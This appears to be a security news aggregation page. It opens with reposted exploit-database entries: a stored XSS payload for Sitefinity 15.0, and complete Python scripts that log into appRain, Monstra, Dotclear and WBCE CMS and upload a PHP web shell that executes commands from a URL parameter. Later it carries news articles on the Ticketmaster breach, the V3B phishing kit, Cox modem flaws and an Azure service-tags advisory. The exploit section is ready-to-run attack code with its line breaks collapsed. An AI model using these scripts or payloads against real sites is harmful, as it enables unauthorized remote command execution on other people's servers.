Sitefinity version 15.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS)# Date: 2023-12-05# Exploit Author: Aldi Saputra Wahyudi# Vendor Homepage: https://www.progress.com/sitefinity-cms# Version: < 15.0.0# Tested on: Windows/Linux# CVE : CVE-2023-27636# Description: In the backend of the Sitefinity CMS, a Cross-site scripting vulnerability has been discovered in all features that use SF-Editor# Steps To Reproduce:Attacker as lower privilegeVictim as Higher privilege1. Login as an Attacker2. Go to the function using the SF Editor, go to the news page as example3. Create or Edit news item4. On the content form, insert the XSS payload as HTML5. After the payload is inserted, click on the content form (just click) and publish or save6. If the victim visits the page with XSS payload, XSS will be triggeredPayload: <noalert><iframe src="javascript:alert(document.domain);">

Sitefinity 15.0 Cross Site Scripting

appRain CMF version 4.0.5 suffers from a remote shell upload vulnerability.

    # Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)# Date: 04/28/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.apprain.org# Software Link:https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip# Version: latest# Tested on: MacOSimport requestsimport sysimport timeimport randomimport stringdef generate_filename():""" Generate a 5-character random string for filename. """return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"def login(site, username, password):print("Logging in...")time.sleep(2)login_url = f"https://{site}/admin/system"session = requests.Session()login_data = {'data[Admin][admin_id]': username,'data[Admin][admin_password]': password}headers = {'Content-Type': 'application/x-www-form-urlencoded'}response = session.post(login_url, data=login_data, headers=headers)if "Logout" in response.text:print("Login Successful!")return sessionelse:print("Login Failed!")sys.exit()def upload_shell(session, site):print("Shell preparing...")time.sleep(2)filename = generate_filename()upload_url = f"https://{site}/admin/filemanager/upload"files = {'data[filemanager][image]': (filename, "<html><body><form method='GET'name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'value='Execute'></form><pre><?php if(isset($_GET['cmd'])){system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')}data = {'submit': 'Upload'}response = session.post(upload_url, files=files, data=data)if response.status_code == 200 and "uploaded successfully" in response.text:print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")else:print("Exploit Failed!")sys.exit()if __name__ == "__main__":print("Exploiting...")time.sleep(2)if len(sys.argv) != 4:print("Usage: python exploit.py sitename.com username password")sys.exit()site = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(site, username, password)upload_shell(session, site)

appRain CMF 4.0.5 Shell Upload

CMSimple version 5.15 suffers from a remote shell upload vulnerability.

    # Exploit Title: CMSimple 5.15 - Remote Command Execution# Date: 04/28/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.cmsimple.org# Software Link: https://www.cmsimple.org/downloads_cmsimple50/CMSimple_5-15.zip# Version: latest# Tested on: MacOS# Log in to SimpleCMS.# Go to Settings > CMS# Append ",php" to the end of the Extensions_userfiles field and save it.# Navigate to Files > Media# Select and upload shell.php# Your shell is ready: https://{url}/userfiles/media/shell.php

CMSimple 5.15 Remote Shell Upload

Monstra CMS version 3.0.4 suffers from a remote code execution vulnerability. Original discovery of code execution in this version is attributed to Ishaq Mohammed in December of 2017.

    # Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)# Date: 05.05.2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://monstra.org/# Software Link: https://monstra.org/monstra-3.0.4.zip# Version: 3.0.4# Tested on: MacOSimport requestsimport randomimport stringimport timeimport reimport sysif len(sys.argv) < 4:print("Usage: python3 script.py <url> <username> <password>")sys.exit(1)base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = requests.Session()login_url = f'{base_url}/admin/index.php?id=dashboard'login_data = {'login': username,'password': password,'login_submit': 'Log+In'}filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))print("Logging in...")response = session.post(login_url, data=login_data)if 'Dashboard' in response.text:print("Login successful")else:print("Login failed")exit()time.sleep(3)edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'response = session.get(edit_url) # CSRF token bulmak için edit sayfasınaerişimtoken_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="(.*?)"', response.text)if token_search:token = token_search.group(1)else:print("CSRF token could not be found.")exit()content = '''<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>'''edit_data = {'csrf': token,'name': filename,'content': content,'add_file': 'Save'}print("Preparing shell...")response = session.post(edit_url, data=edit_data)time.sleep(3)if response.status_code == 200:print(f"Your shell is ready: {base_url}/public/themes/default/{filename}.chunk.php")else:print("Failed to prepare shell.")

Monstra CMS 3.0.4 Remote Code Execution

Dotclear version 2.29 suffers from a remote code execution vulnerability.

    # Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)# Discovered by: Ahmet Ümit BAYRAM# Discovered Date: 26.04.2024# Vendor Homepage: https://git.dotclear.org/explore/repos# Software Link:https://github.com/dotclear/dotclear/archive/refs/heads/master.zip# Tested Version: v2.29 (latest)# Tested on: MacOSimport requestsimport timeimport randomimport stringfrom bs4 import BeautifulSoupdef generate_filename(extension=".inc"):return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +extensiondef get_csrf_token(response_text):soup = BeautifulSoup(response_text, 'html.parser')token = soup.find('input', {'name': 'xd_check'})return token['value'] if token else Nonedef login(base_url, username, password):print("Exploiting...")time.sleep(1)print("Logging in...")time.sleep(1)session = requests.Session()login_data = {"user_id": username,"user_pwd": password}login_url = f"{base_url}/admin/index.php?process=Auth"login_response = session.post(login_url, data=login_data)if "Logout" in login_response.text:print("Login Successful!")return sessionelse:print("Login Failed!")return Nonedef upload_file(session, base_url, filename):print("Shell Preparing...")time.sleep(1)boundary = "---------------------------376201441124932790524235275389"headers = {"Content-Type": f"multipart/form-data; boundary={boundary}","X-Requested-With": "XMLHttpRequest"}csrf_token = get_csrf_token(session.get(f"{base_url}/admin/index.php?process=Media").text)payload = (f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"f"2097152\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"f"{csrf_token}\r\n"f"--{boundary}\r\n"f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}\"\r\n"f"Content-Type: image/jpeg\r\n\r\n""<html>\n<body>\n<form method=\"GET\" name=\"<?php echobasename($_SERVER['PHP_SELF']); ?>\">\n""<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<inputtype=\"SUBMIT\" value=\"Execute\">\n""</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}\n?>\n</pre>\n</body>\n</html>\r\n"f"--{boundary}--\r\n")upload_response = session.post(f"{base_url}/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",headers=headers, data=payload.encode('utf-8'))if upload_response.status_code == 200:print(f"Your Shell is Ready: {base_url}/public/{filename}")else:print("Exploit Failed!")def main(base_url, username, password):filename = generate_filename()session = login(base_url, username, password)if session:upload_file(session, base_url, filename)if __name__ == "__main__":import sysif len(sys.argv) != 4:print("Usage: python script.py <siteurl> <username> <password>")else:base_url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]main(base_url, username, password)

Dotclear 2.29 Remote Code Execution

WBCE CME version 1.6.2 suffers from a remote code execution vulnerability.

    # Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)# Date: 3/5/2024# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://wbce-cms.org/# Software Link:https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip# Version: 1.6.2# Tested on: MacOSimport requestsfrom bs4 import BeautifulSoupimport sysimport timedef login(url, username, password):print("Logging in...")time.sleep(3)with requests.Session() as session:response = session.get(url + "/admin/login/index.php")soup = BeautifulSoup(response.text, 'html.parser')form = soup.find('form', attrs={'name': 'login'})form_data = {input_tag['name']: input_tag.get('value', '') for input_tag inform.find_all('input') if input_tag.get('type') != 'submit'}# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelleform_data[soup.find('input', {'name': 'username_fieldname'})['value']] =usernameform_data[soup.find('input', {'name': 'password_fieldname'})['value']] =passwordpost_response = session.post(url + "/admin/login/index.php", data=form_data)if "Administration" in post_response.text:print("Login successful!")time.sleep(3)return sessionelse:print("Login failed.")print("Headers received:", post_response.headers)print("Response content:", post_response.text[:500]) # İlk 500 karakterreturn Nonedef upload_file(session, url):# Dosya içeriğini ve adını belirleyinprint("Shell preparing...")time.sleep(3)files = {'upload[]': ('shell.inc',"""<html><body><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?phpif(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body></html>""", 'application/octet-stream')}data = {'reqid': '18f3a5c13d42c5','cmd': 'upload','target': 'l1_Lw','mtime[]': '1714669495'}response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",files=files, data=data)if response.status_code == 200:print("Your Shell is Ready: " + url + "/media/shell.inc")else:print("Failed to upload file.")print(response.text)if __name__ == "__main__":url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(url, username, password)if session:upload_file(session, url)

WBCE CMS 1.6.2 Remote Code Execution

In an SEC filing, Live Nation Entertainment confirmed its subsidiary Ticketmaster suffered a data breach, claiming it will…

In an SEC filing, Live Nation Entertainment confirmed its subsidiary Ticketmaster suffered a data breach, claiming it will not materially impact overall business operations.

Last week, on May 28, 2024, Hackread.com exclusively reported a significant data breach involving Live Nation Entertainment and its subsidiary Ticketmaster. This breach involved the notorious hacker or hacker group ShinyHunters, also the admin of the cybercrime forum Breach Forums. The hacker had put up the data of 560 million Ticketmaster users for sale at $500,000.

In a subsequent SEC (U.S. Securities and Exchange Commission) filing, Live Nation confirmed the data breach, validating Hackread.com’s initial report. The company’s statement filed on May 31, 2024, detailed the timeline and the nature of the breach:

> _“On May 20, 2024, Live Nation Entertainment, Inc. (the “Company” or “we”) identified unauthorized activity within a third-party cloud database environment containing Company data (primarily from its Ticketmaster L.L.C. subsidiary) and launched an investigation with industry-leading forensic investigators to understand what happened.”_
> 
> _“On May 27, 2024, a criminal threat actor offered what it alleged to be Company user data for sale via the dark web. We are working to mitigate risk to our users and the Company, and have notified and are cooperating with law enforcement. As appropriate, we are also notifying regulatory authorities and users with respect to unauthorized access to personal information. “_
> 
> Live Nation Entertainment, Inc

Despite the detailed acknowledgement, the identity of the third-party cloud company involved remains undisclosed. Some rumours speculate that Snowflake Inc., a prominent cloud computing-based data cloud company, might be the implicated party.

****Ticketmaster, Santander Bank Data Breach and Snowflake****

It is worth noting that another confirmed data breach linked to Snowflake is the massive hack of Santander Bank by the hacking group ShinyHunters, involving 30 million user records from Spain, Chile, and Uruguay.

The stolen Santander Bank data was being sold for $1.5 million last week. However, in an exclusive statement to Hackread.com, the hacker claimed to have already sold the data for that price. This breach has raised additional concerns, despite denials from Snowflake and ShinyHunters regarding their involvement.

However, Snowflake’s internal investigations, conducted with the assistance of cybersecurity firms CrowdStrike and Google’s Mandiant, concluded that Snowflake itself was not breached.

Snowflake’s findings did reveal an unrelated security issue. A former employee’s credentials were used to access demo accounts. While these accounts did not contain sensitive data or credentials that could compromise production systems, Snowflake emphasized the importance of their security measures:

> _“We have not identified evidence suggesting this activity was caused by a vulnerability, misconfiguration, or breach of Snowflake’s platform; we have not identified evidence suggesting this activity was caused by compromised credentials of current or former Snowflake personnel.”_
> 
> _“We did find evidence that a threat actor obtained personal credentials to and accessed demo accounts belonging to a former Snowflake employee. It did not contain sensitive data. Demo accounts are not connected to Snowflake’s production or corporate systems. The access was possible because the demo account was not behind Okta or Multi-Factor Authentication (MFA), unlike Snowflake’s corporate and production systems.”_
> 
> Snowflake

Live Nation is now focusing on mitigating the risks associated with this breach. They have engaged industry-leading forensic investigators and cooperating with law enforcement and regulatory authorities. The company has also started notifying affected users.

The Ticketmaster data breach shows the critical need for vital cybersecurity measures, particularly in managing third-party cloud environments. As investigations continue, both Live Nation and Snowflake are working to ensure that such incidents do not recur.

Nevertheless, while the immediate financial impact of the breach on Live Nation appears limited, the long-term implications for user trust and regulatory scrutiny could be significant. The cybersecurity community and users alike will watch closely as more details emerge. Therefore, stay tuned, this article will be updated accordingly.

1.  Ticketmaster hacked a rival and now it’s paying a $10M fine
2.  Massive Cloud Database Leak Exposes 380 Million Records
3.  After Denial, AT&T Confirms Data Breach Affecting 73M Users
4.  Thousands of Stolen AnyDesk Login Credentials Sold on Dark Web
5.  Nissan Confirms Data Breach Affected 100K Customers, Employees

Live Nation Confirms Massive Ticketmaster Data Breach

By Deeba Ahmed
New phishing kit targets European bank users! Protect yourself from V3B attacks designed to steal your logins and…
This is a post from HackRead.com Read the original post: New V3B Phishing Kit Steals Logins and OTPs from EU Banking Users

New phishing kit targets European bank users! Protect yourself from V3B attacks designed to steal your logins and one-time passwords (OTPs). Learn how to spot these scams and keep your finances safe.

Cybercriminals are constantly developing new tactics to steal financial information from unsuspecting victims. A recent report by cybersecurity firm Resecurity highlights a dangerous new threat – the V3B phishing kit – specifically targeting European banking customers.

****What is a Phishing Kit?****

These are pre-made toolkits readily available on the dark web, allowing even novice cybercriminals to launch sophisticated phishing attacks by providing pre-designed email templates, fake login pages, and even malware.

****The V3B Phishing Threat****

According to Resecurity, a cybercriminal group is selling a sophisticated **phishing kit** called “V3B” on Telegram. A group member, using the alias “Vssrtje,” launched operations in March 2023, and the kit is priced between $130-$450 per month.

It has already attracted over 1,255 skilled cybercriminals specializing in fraud, including social engineering, SIM swapping schemes, and banking and credit card fraud. V3B supports targeted attacks on over 54 EU (European Union) financial institutions including the following:

*   **Italy**
*   **Ireland**
*   **Austria**
*   **France**
*   **Finland**
*   **Greece**
*   **Belgium**
*   **Germany**
*   **Netherlands**
*   **Luxembourg**

****Key Features****

The kit can intercept sensitive information, including credentials and OTP (one-time password) codes, using social engineering tactics. It has two components: a scenario-based credential interception system (V3B) and online banking authorization pages. 

Built on a customized CMS, the kit features templates in multiple languages, including Finnish, French, and German, mimicking the authentication and verification processes of the EU’s online banking and e-commerce systems. In addition, it has advanced features like updated tokens, anti-bot measures, mobile and desktop interfaces, live chat, and OTP/TAN/2FA support. 

Through real-time interaction with victims, the kit allows fraudsters to orchestrate specific actions, gain unauthorized access, or facilitate fraudulent transactions. It triggers a request for QR Code, a new twist on QR code phishing, using a browser extension to grab codes from a service’s site and pipe them to a phishing site. The kit also uses PhotoTAN and Smart ID support, a popular method of authentication for mobile banking, to manipulate the victim’s actions.

****How to Stay Safe?****

To protect yourself from V3B phishing attacks, verify the sender’s email address carefully, avoid entering information on unfamiliar websites, and enable multi-factor authentication (**MFA**) as an extra layer of security. Staying vigilant and following these security best practices can significantly reduce your chances of falling victim to V3B phishing attacks or similar scams.

1.  EvilProxy Phishing Kit Hits 100+ Firms, Bypasses MFA
2.  BlackLotus UEFI bootkit Can Bypass Secure Boot on Windows
3.  Meet MEWKit, a tricky phishing attack draining Ethereum wallets
4.  Telekopye Toolkit Used as Telegram Bot to Scam Marketplace Users
5.  NPM Typosquatting Attack Deploys r77 Rootkit via Legitimate Package

New V3B Phishing Kit Steals Logins and OTPs from EU Banking Users

Now-patched authorization bypass issues impacting Cox modems that could have been abused as a starting point to gain unauthorized access to the devices and run malicious commands.
"This series of vulnerabilities demonstrated a way in which a fully external attacker with no prerequisites could've executed commands and modified the settings of millions of modems, accessed any business customer's

Researcher Uncovers Flaws in Cox Modems, Potentially Impacting Millions

Summary Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

**Summary**

Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose. Although Microsoft initially confirmed the vulnerability and paid Tenable a bounty for their contributions, further investigation into Tenable’s report determined that service tags work as designed and best practices needed to be clearly communicated through service documentation as we had communicated in our follow-up correspondence with Tenable.

Cross-tenant access is prevented by authentication and only represents an issue where authentication is not used. However, this case does highlight an inherent risk in using service tags as a single mechanism for vetting incoming network traffic. **Service tags are not to be treated as a security boundary and should only be used as a routing mechanism in conjunction with validation controls.** No exploitation or abuse of service tags has been reported by a third-party or seen in the wild per our own investigation.

As always, we strongly encourage customers to use multiple layers of security for their resources, such as monitoring network traffic and authentication. As a result of Tenable’s report, we’ve updated our documentation to remind customers of the function of service tags.

The goal of this update to service tags documentation is to improve our customers’ understanding of service tags and how they function. As such, there is no mandatory action required by customers and no additional messaging provided in the Azure Portal. However, Microsoft strongly recommends that customers proactively review their use of service tags and validate their security measures to authenticate only trusted network traffic for service tags.

**Technical Details**

Service tags are a convenient way to represent a block of IP space for many Azure services. Resources can use service tags to reference Azure services in their firewall rules, for example to allow traffic from a given service to access the resource.

Some of these services allow inbound traffic via a service tag and contain features that give users control over parts of a web request (i.e., URL path, destination host, etc.). Potentially, an attacker in Tenant A can use these web requests to access web resources in Tenant B if it has been configured to allow traffic from the service tag and does not otherwise provide any form of authentication.

In these cases, impact is determined in part by the following factors:

*   Whether the victim service performs an auth check of its own
*   How much of the request body can be controlled by the attacker
*   Whether the response content can be viewed by the attacker

**Example: Azure Monitor Availability Tests**

For example, Azure Monitor Availability Tests service has an ApplicationInsightsAvailability service tag that enables users to configure webtests through a firewall to access their service endpoint(s) and perform synthetics monitoring. Because these webtests use the same public IP addresses in a shared infrastructure to call a user’s service endpoint(s), a user could configure a web request to access a service endpoint from another Azure Monitor Availability Tests subscription. This behavior could enable a malicious actor to send web requests to another user’s service endpoint(s) and the application may process the unintended web request, if:

1.  the malicious actor had access to a tenant that enabled the ApplicationInsightsAvailability service tag and
2.  the target service endpoint does not perform any of its own authentication checks.

**Customer Guidance  **

Service tags represent a range of IP addresses for a given Azure service and are used for network configuration such as firewall filtering, network security groups (NSGs), and user-defined routes (UDRs). This functionality of the service tags is crucial to allow network traffic between the Azure service and a user’s service endpoint(s). Given the flexible use cases for service tags, customers must consider their network traffic between tenants and their specific scenarios for a service.

**Service tags are not a comprehensive way to secure traffic to a customer’s origin and do not replace input validation to prevent vulnerabilities that may be associated with web requests.** Input validation is used to assure where the traffic originates and who is sending the traffic. Additional authentication and authorization checks must be implemented for a layered network security approach.

Azure customers are highly encouraged to review their use of Microsoft virtual network service tags and evaluate if additional measures must be put in place to secure network traffic between Azure tenants. After a customer has reviewed service tag(s) usage, they can:

*   Review the new best practices article for Microsoft service tags and follow specific guidance if provided by a service.
*   Review Azure security fundamentals documentation to ensure that their Azure platform and infrastructure are set up with general and security best practices in mind.
*   Review Azure Monitor documentation to ensure that their Azure platform and infrastructure has appropriate monitoring controls enabled to collect, analyze, and respond to system events.

**Example: Azure Monitor Availability Tests with Authentication Check  **

Azure Monitor Availability Tests provide a customer with an opportunity to monitor the uptime of their resources. Customers must consider this in their resource monitoring strategy. Using Azure Monitor Availability Tests along with the associated service tag ensures adherence to a standard monitoring strategy.

To prevent the ApplicationInsightsAvailability service tag from passing unwanted network traffic to your service endpoint(s), create a token and add it as a HTTP header in your availability test. Your service can then validate the HTTP header in incoming requests to authenticate that the origin of traffic is from your availability tests. Thus, all other requests without the custom HTTP header would be rejected and dropped. Learn more about this application layer security control for Azure Monitor Availability Tests here.

In addition to the above, some customers may have the following scenario. Company A may provide an API to several industry partners so they can use it in their services or applications. Each of these partners may want to monitor the uptime of Company A’s APIs through Azure Monitor Availability Tests. Thus, Company A will have to decide on their resource monitoring strategy for their APIs and how to communicate that strategy to their industry partners.

In the pursuit of secure-by-design principles, Company A could implement a validation check for their HTTP headers. Company A’s resource monitoring strategy would only be accessible to industry partners with a custom header, ensuring secure collaboration. Alternately, Company A could decide not to require a custom header and instead use their own method of authentication, enabling anyone to monitor their APIs through Azure Monitor Availability Tests.

**Microsoft’s Response and Timeline of Events**

Microsoft took the following actions after this activity was brought to its attention:

*   Microsoft performed a comprehensive variant hunt, telemetry investigation, and engineering review of this issue which influenced the mitigation strategy
*   Azure services with inbound service tags updated documentation to include information about their service tag(s) use cases and/or guidance to confirm network traffic
*   Azure documented best practices for service tags in a general article

We have provided the timeline of key events associated with this issue as well as highlight our approach to increase available service documentation to customers to prevent this issue:

*   **24 January 2024:** Tenable submits a potential security vulnerability though the MSRC researcher portal.
*   **31 January 2024**: MSRC confirms the observed vulnerability and awards a bounty to Tenable.
*   **2 February 2024**: Microsoft reviews the issue and started to perform a comprehensive variant hunt, telemetry investigation, and engineering review of this behavior to determine a mitigation strategy.
*   **26 February 2024**: Microsoft communicates our customer disclosure strategy and commitment to enhancing Azure services’ service tag documentation to address the issue.
*   **6 March 2024**: Microsoft and Tenable agree to a coordinated disclosure for this issue.
*   **31 March 2024**: Microsoft concludes our comprehensive variant hunt, telemetry investigation, and engineering review for this issue.
*   **3 April 2024**: Microsoft expresses in written feedback to Tenable that this issue is not a SSRF vulnerability.
*   **3 May 2024**: Microsoft expresses in written feedback to Tenable that this issue is not a firewall bypass vulnerability.
*   **10 May 2024**: Microsoft made the service tags documentation changes publicly available on Microsoft Learn.
*   **3 June 2024**: Microsoft and Tenable disclose this issue to the public.

**Acknowledgement**

We appreciate the opportunity to investigate the findings reported by Tenable and thank them for practicing safe security research under the terms of the Microsoft Bug Bounty Program. We encourage all researchers to work with vendors under Coordinated Vulnerability Disclosure (CVD) and abide by the rules of engagement for penetration testing to avoid impacting customer data while conducting security research.

Microsoft has a long history of working with third-party researchers and others across the security community. This is reflected in our Secure Future Initiative (SFI), further promoting transparency in how we work with security researchers and respond to claims of risk associated with our products and platforms services. Microsoft is committed to sharing our analysis of researchers’ claims and providing recommendations to customers and the community.

**References**

*   Questions? Open a support case through the Azure Portal at aka.ms/azsupt
*   Learn more about Azure Virtual Network Service Tags at Azure service tags overview | Microsoft Learn
*   Learn more about Azure security fundamentals at Azure security fundamentals documentation | Microsoft Learn
*   Learn more about Azure Monitor at Azure Monitor documentation - Azure Monitor | Microsoft Learn

Tag

#auth